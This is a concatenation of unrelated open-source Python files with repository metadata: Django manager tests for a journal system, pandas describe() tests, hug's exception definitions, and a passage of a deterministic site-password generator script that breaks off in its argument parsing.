get_all_collections=get_user_collections).suspended()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'suspended')
def test_deceased(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='deceased')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).deceased()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'deceased')
def test_inprogress(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='inprogress')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).inprogress()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'inprogress')
class SectionManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.Section.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.SectionQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal1 = modelfactories.JournalFactory.create(collection=collection1)
section1 = modelfactories.SectionFactory.create(journal=journal1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
section2 = modelfactories.SectionFactory.create(journal=journal2)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_sections.count(), 2)
self.assertIn(section1, user_sections)
self.assertIn(section2, user_sections)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal1 = modelfactories.JournalFactory.create(collection=collection1)
section1 = modelfactories.SectionFactory.create(journal=journal1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
section2 = modelfactories.SectionFactory.create(journal=journal2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_sections = models.Section.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_sections.count(), 1)
self.assertIn(section2, user_sections)
def test_available_returns_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sections.count(), 1)
def test_available_ignores_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sections.count(), 0)
def test_unavailable_returns_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sections.count(), 1)
def test_unavailable_ignores_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal = modelfactories.JournalFactory.create(
collection=collection)
modelfactories.SectionFactory.create(
journal=journal, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_sections = models.Section.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sections.count(), 0)
class SponsorManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.Sponsor.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.SponsorQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
sponsor1 = modelfactories.SponsorFactory.create()
sponsor1.collections.add(collection1)
sponsor2 = modelfactories.SponsorFactory.create()
sponsor2.collections.add(collection2)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_sponsors.count(), 2)
self.assertIn(sponsor1, user_sponsors)
self.assertIn(sponsor2, user_sponsors)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
sponsor1 = modelfactories.SponsorFactory.create()
sponsor1.collections.add(collection1)
sponsor2 = modelfactories.SponsorFactory.create()
sponsor2.collections.add(collection2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_sponsors = models.Sponsor.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor2, user_sponsors)
def test_startswith_is_based_on_name_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('F')
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor1, user_sponsors)
def test_startswith_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('F')
lower_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('f')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_startswith_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith('ZAP')
self.assertEqual(user_sponsors.count(), 0)
def test_startswith_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'7 BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).startswith(7)
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor2, user_sponsors)
def test_simple_search_is_based_on_name_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('FOO')
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor1, user_sponsors)
def test_simple_search_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('FOO')
lower_cased = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('foo')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_simple_search_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search('ZAP')
self.assertEqual(user_sponsors.count(), 0)
def test_simple_search_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO')
sponsor1.collections.add(collection)
sponsor2 = modelfactories.SponsorFactory.create(
name=u'7 BAR')
sponsor2.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).simple_search(7)
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor2, user_sponsors)
def test_available_returns_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=False)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sponsors.count(), 1)
self.assertIn(sponsor1, user_sponsors)
def test_available_ignores_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=True)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_sponsors.count(), 0)
def test_unavailable_returns_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=True)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sponsors.count(), 1)
def test_unavailable_ignores_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
sponsor1 = modelfactories.SponsorFactory.create(
name=u'FOO', is_trashed=False)
sponsor1.collections.add(collection)
def get_user_collections():
return user.user_collection.all()
user_sponsors = models.Sponsor.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_sponsors.count(), 0)
class RegularPressReleaseManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.RegularPressRelease.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.RegularPressReleaseQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
issue = modelfactories.IssueFactory.create(journal=journal)
issue2 = modelfactories.IssueFactory.create(journal=journal2)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
pr2 = modelfactories.RegularPressReleaseFactory.create(issue=issue2)
def get_user_collections():
return user.user_collection.all()
user_prs = models.RegularPressRelease.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_prs.count(), 2)
self.assertIn(pr, user_prs)
self.assertIn(pr2, user_prs)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
issue = modelfactories.IssueFactory.create(journal=journal)
issue2 = modelfactories.IssueFactory.create(journal=journal2)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
pr2 = modelfactories.RegularPressReleaseFactory.create(issue=issue2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.RegularPressRelease.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr2, user_prs)
def test_journal_accepts_journal_objects(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
issue = modelfactories.IssueFactory.create(journal=journal)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.RegularPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
def test_journal_accepts_journal_pk(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
issue = modelfactories.IssueFactory.create(journal=journal)
pr = modelfactories.RegularPressReleaseFactory.create(issue=issue)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.RegularPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal.pk)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
class AheadPressReleaseManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.AheadPressRelease.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.AheadPressReleaseQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
pr2 = modelfactories.AheadPressReleaseFactory.create(journal=journal2)
def get_user_collections():
return user.user_collection.all()
user_prs = models.AheadPressRelease.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_prs.count(), 2)
self.assertIn(pr, user_prs)
self.assertIn(pr2, user_prs)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
pr2 = modelfactories.AheadPressReleaseFactory.create(journal=journal2)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.AheadPressRelease.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr2, user_prs)
def test_journal_accepts_journal_objects(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.AheadPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
def test_journal_accepts_journal_pk(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
collection.make_default_to_user(user)
journal = modelfactories.JournalFactory.create(collection=collection)
pr = modelfactories.AheadPressReleaseFactory.create(journal=journal)
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_prs = models.AheadPressRelease.userobjects.active(
get_active_collection=get_active_collection).journal(journal.pk)
self.assertEqual(user_prs.count(), 1)
self.assertIn(pr, user_prs)
| bsd-2-clause | -2,289,931,664,152,842,800 | 33.862802 | 82 | 0.671092 | false |
jreback/pandas | pandas/tests/frame/methods/test_describe.py | 1 | 12434 | import numpy as np
import pandas as pd
from pandas import Categorical, DataFrame, Series, Timestamp, date_range
import pandas._testing as tm
class TestDataFrameDescribe:
def test_describe_bool_in_mixed_frame(self):
df = DataFrame(
{
"string_data": ["a", "b", "c", "d", "e"],
"bool_data": [True, True, False, False, False],
"int_data": [10, 20, 30, 40, 50],
}
)
# Integer data are included in .describe() output,
# Boolean and string data are not.
result = df.describe()
expected = DataFrame(
{"int_data": [5, 30, df.int_data.std(), 10, 20, 30, 40, 50]},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
tm.assert_frame_equal(result, expected)
# Top value is a boolean value that is False
result = df.describe(include=["bool"])
expected = DataFrame(
{"bool_data": [5, 2, False, 3]}, index=["count", "unique", "top", "freq"]
)
tm.assert_frame_equal(result, expected)
def test_describe_empty_object(self):
# GH#27183
df = DataFrame({"A": [None, None]}, dtype=object)
result = df.describe()
expected = DataFrame(
{"A": [0, 0, np.nan, np.nan]},
dtype=object,
index=["count", "unique", "top", "freq"],
)
tm.assert_frame_equal(result, expected)
result = df.iloc[:0].describe()
tm.assert_frame_equal(result, expected)
def test_describe_bool_frame(self):
# GH#13891
df = DataFrame(
{
"bool_data_1": [False, False, True, True],
"bool_data_2": [False, True, True, True],
}
)
result = df.describe()
expected = DataFrame(
{"bool_data_1": [4, 2, False, 2], "bool_data_2": [4, 2, True, 3]},
index=["count", "unique", "top", "freq"],
)
tm.assert_frame_equal(result, expected)
df = DataFrame(
{
"bool_data": [False, False, True, True, False],
"int_data": [0, 1, 2, 3, 4],
}
)
result = df.describe()
expected = DataFrame(
{"int_data": [5, 2, df.int_data.std(), 0, 1, 2, 3, 4]},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
tm.assert_frame_equal(result, expected)
df = DataFrame(
{"bool_data": [False, False, True, True], "str_data": ["a", "b", "c", "a"]}
)
result = df.describe()
expected = DataFrame(
{"bool_data": [4, 2, False, 2], "str_data": [4, 3, "a", 2]},
index=["count", "unique", "top", "freq"],
)
tm.assert_frame_equal(result, expected)
def test_describe_categorical(self):
df = DataFrame({"value": np.random.randint(0, 10000, 100)})
labels = [f"{i} - {i + 499}" for i in range(0, 10000, 500)]
cat_labels = Categorical(labels, labels)
df = df.sort_values(by=["value"], ascending=True)
df["value_group"] = pd.cut(
df.value, range(0, 10500, 500), right=False, labels=cat_labels
)
cat = df
# Categoricals should not show up together with numerical columns
result = cat.describe()
assert len(result.columns) == 1
# In a frame, describe() for the cat should be the same as for string
# arrays (count, unique, top, freq)
cat = Categorical(
["a", "b", "b", "b"], categories=["a", "b", "c"], ordered=True
)
s = Series(cat)
result = s.describe()
expected = Series([4, 2, "b", 3], index=["count", "unique", "top", "freq"])
tm.assert_series_equal(result, expected)
cat = Series(Categorical(["a", "b", "c", "c"]))
df3 = DataFrame({"cat": cat, "s": ["a", "b", "c", "c"]})
result = df3.describe()
tm.assert_numpy_array_equal(result["cat"].values, result["s"].values)
def test_describe_empty_categorical_column(self):
# GH#26397
# Ensure the index of an empty categorical DataFrame column
# also contains (count, unique, top, freq)
df = DataFrame({"empty_col": Categorical([])})
result = df.describe()
expected = DataFrame(
{"empty_col": [0, 0, np.nan, np.nan]},
index=["count", "unique", "top", "freq"],
dtype="object",
)
tm.assert_frame_equal(result, expected)
# ensure NaN, not None
assert np.isnan(result.iloc[2, 0])
assert np.isnan(result.iloc[3, 0])
def test_describe_categorical_columns(self):
# GH#11558
columns = pd.CategoricalIndex(["int1", "int2", "obj"], ordered=True, name="XXX")
df = DataFrame(
{
"int1": [10, 20, 30, 40, 50],
"int2": [10, 20, 30, 40, 50],
"obj": ["A", 0, None, "X", 1],
},
columns=columns,
)
result = df.describe()
exp_columns = pd.CategoricalIndex(
["int1", "int2"],
categories=["int1", "int2", "obj"],
ordered=True,
name="XXX",
)
expected = DataFrame(
{
"int1": [5, 30, df.int1.std(), 10, 20, 30, 40, 50],
"int2": [5, 30, df.int2.std(), 10, 20, 30, 40, 50],
},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
columns=exp_columns,
)
tm.assert_frame_equal(result, expected)
tm.assert_categorical_equal(result.columns.values, expected.columns.values)
def test_describe_datetime_columns(self):
columns = pd.DatetimeIndex(
["2011-01-01", "2011-02-01", "2011-03-01"],
freq="MS",
tz="US/Eastern",
name="XXX",
)
df = DataFrame(
{
0: [10, 20, 30, 40, 50],
1: [10, 20, 30, 40, 50],
2: ["A", 0, None, "X", 1],
}
)
df.columns = columns
result = df.describe()
exp_columns = pd.DatetimeIndex(
["2011-01-01", "2011-02-01"], freq="MS", tz="US/Eastern", name="XXX"
)
expected = DataFrame(
{
0: [5, 30, df.iloc[:, 0].std(), 10, 20, 30, 40, 50],
1: [5, 30, df.iloc[:, 1].std(), 10, 20, 30, 40, 50],
},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
expected.columns = exp_columns
tm.assert_frame_equal(result, expected)
assert result.columns.freq == "MS"
assert result.columns.tz == expected.columns.tz
def test_describe_timedelta_values(self):
# GH#6145
t1 = pd.timedelta_range("1 days", freq="D", periods=5)
t2 = pd.timedelta_range("1 hours", freq="H", periods=5)
df = DataFrame({"t1": t1, "t2": t2})
expected = DataFrame(
{
"t1": [
5,
pd.Timedelta("3 days"),
df.iloc[:, 0].std(),
pd.Timedelta("1 days"),
pd.Timedelta("2 days"),
pd.Timedelta("3 days"),
pd.Timedelta("4 days"),
pd.Timedelta("5 days"),
],
"t2": [
5,
pd.Timedelta("3 hours"),
df.iloc[:, 1].std(),
pd.Timedelta("1 hours"),
pd.Timedelta("2 hours"),
pd.Timedelta("3 hours"),
pd.Timedelta("4 hours"),
pd.Timedelta("5 hours"),
],
},
index=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
result = df.describe()
tm.assert_frame_equal(result, expected)
exp_repr = (
" t1 t2\n"
"count 5 5\n"
"mean 3 days 00:00:00 0 days 03:00:00\n"
"std 1 days 13:56:50.394919273 0 days 01:34:52.099788303\n"
"min 1 days 00:00:00 0 days 01:00:00\n"
"25% 2 days 00:00:00 0 days 02:00:00\n"
"50% 3 days 00:00:00 0 days 03:00:00\n"
"75% 4 days 00:00:00 0 days 04:00:00\n"
"max 5 days 00:00:00 0 days 05:00:00"
)
assert repr(result) == exp_repr
def test_describe_tz_values(self, tz_naive_fixture):
# GH#21332
tz = tz_naive_fixture
s1 = Series(range(5))
start = Timestamp(2018, 1, 1)
end = Timestamp(2018, 1, 5)
s2 = Series(date_range(start, end, tz=tz))
df = DataFrame({"s1": s1, "s2": s2})
expected = DataFrame(
{
"s1": [5, 2, 0, 1, 2, 3, 4, 1.581139],
"s2": [
5,
Timestamp(2018, 1, 3).tz_localize(tz),
start.tz_localize(tz),
s2[1],
s2[2],
s2[3],
end.tz_localize(tz),
np.nan,
],
},
index=["count", "mean", "min", "25%", "50%", "75%", "max", "std"],
)
result = df.describe(include="all", datetime_is_numeric=True)
tm.assert_frame_equal(result, expected)
def test_datetime_is_numeric_includes_datetime(self):
df = DataFrame({"a": pd.date_range("2012", periods=3), "b": [1, 2, 3]})
result = df.describe(datetime_is_numeric=True)
expected = DataFrame(
{
"a": [
3,
Timestamp("2012-01-02"),
Timestamp("2012-01-01"),
Timestamp("2012-01-01T12:00:00"),
Timestamp("2012-01-02"),
Timestamp("2012-01-02T12:00:00"),
Timestamp("2012-01-03"),
np.nan,
],
"b": [3, 2, 1, 1.5, 2, 2.5, 3, 1],
},
index=["count", "mean", "min", "25%", "50%", "75%", "max", "std"],
)
tm.assert_frame_equal(result, expected)
def test_describe_tz_values2(self):
tz = "CET"
s1 = Series(range(5))
start = Timestamp(2018, 1, 1)
end = Timestamp(2018, 1, 5)
s2 = Series(date_range(start, end, tz=tz))
df = DataFrame({"s1": s1, "s2": s2})
s1_ = s1.describe()
s2_ = Series(
[
5,
5,
s2.value_counts().index[0],
1,
start.tz_localize(tz),
end.tz_localize(tz),
],
index=["count", "unique", "top", "freq", "first", "last"],
)
idx = [
"count",
"unique",
"top",
"freq",
"first",
"last",
"mean",
"std",
"min",
"25%",
"50%",
"75%",
"max",
]
expected = pd.concat([s1_, s2_], axis=1, keys=["s1", "s2"]).loc[idx]
with tm.assert_produces_warning(FutureWarning):
result = df.describe(include="all")
tm.assert_frame_equal(result, expected)
def test_describe_percentiles_integer_idx(self):
# GH#26660
df = DataFrame({"x": [1]})
pct = np.linspace(0, 1, 10 + 1)
result = df.describe(percentiles=pct)
expected = DataFrame(
{"x": [1.0, 1.0, np.NaN, 1.0, *[1.0 for _ in pct], 1.0]},
index=[
"count",
"mean",
"std",
"min",
"0%",
"10%",
"20%",
"30%",
"40%",
"50%",
"60%",
"70%",
"80%",
"90%",
"100%",
"max",
],
)
tm.assert_frame_equal(result, expected)
| bsd-3-clause | 5,314,292,373,838,665,000 | 33.348066 | 88 | 0.430835 | false |
MuhammadAlkarouri/hug | hug/exceptions.py | 1 | 1675 | """hug/exceptions.py
Defines the custom exceptions that are part of, and support, hug
Copyright (C) 2016 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import
class InvalidTypeData(Exception):
"""Should be raised when data passed in doesn't match a types expectations"""
def __init__(self, message, reasons=None):
self.message = message
self.reasons = reasons
class StoreKeyNotFound(Exception):
"""Should be raised when a store key has not been found inside a store"""
class SessionNotFound(StoreKeyNotFound):
"""Should be raised when a session ID has not been found inside a session store"""
pass
| mit | -3,855,715,342,116,879,400 | 43.078947 | 112 | 0.77194 | false |
odedlaz/python-password-chameleon | run.py | 1 | 2465 | #!/bin/python
from __future__ import print_function
from binascii import hexlify
import hashlib
import base64
from getpass import getpass
import sys
import argparse
charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
chameleon_charset = "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz123456789?!#@&$="
numbers = "123456789"
letters = "ABCDEFGHIJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
punct = "?!#@&$"
def hashify(item):
m = hashlib.sha1()
m.update(item)
return m.digest()
def generate(secretpassword, sitename):
chained = "{0}:{1}".format(secretpassword,sitename.lower())
secret_hash = hashify(chained)
base64_secret = base64.b64encode(secret_hash)[:10]
encoded_secret = change_encoding(base64_secret)
pwd = ensurenumberandletter(encoded_secret)
return pwd
def change_encoding(s):
encoded = ""
for character in s:
index = charset.index(character)
encoded = encoded + chameleon_charset[index]
return encoded
def ensurenumberandletter(s):
hasnumber = False
hasletter = False
haspunct = False
for character in s:
if character in numbers:
hasnumber = True
if character in letters:
hasletter = True
if character in punct:
haspunct = True
if not hasnumber:
s = "1" + s[1:]
if not hasletter:
s = s[:1] + "a" + s[2:]
if not haspunct:
s = s[:2] + "@" + s[3:]
return s
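# Example (illustrative only; the exact output depends on the SHA-1 digest):
#   generate("my master password", "example.com")
# returns a deterministic 10-character string drawn from chameleon_charset and
# post-processed by ensurenumberandletter, so it always contains at least one
# digit, one letter and one character from `punct`.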
def copy_passwd_to_clipboard(passwd):
try:
import pyperclip
pyperclip.copy(passwd)
except ImportError:
print("cannot copy to clipboard because the pyperclip package is not installed.")
def main(args):
print("generating password for site: {0}".format(args.sitename))
master_passwd = getpass("enter the master password: ")
generated_passwd = generate(master_passwd, args.sitename)
print("generated password: {}".format(generated_passwd))
if args.copy:
copy_passwd_to_clipboard(generated_passwd)
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser()
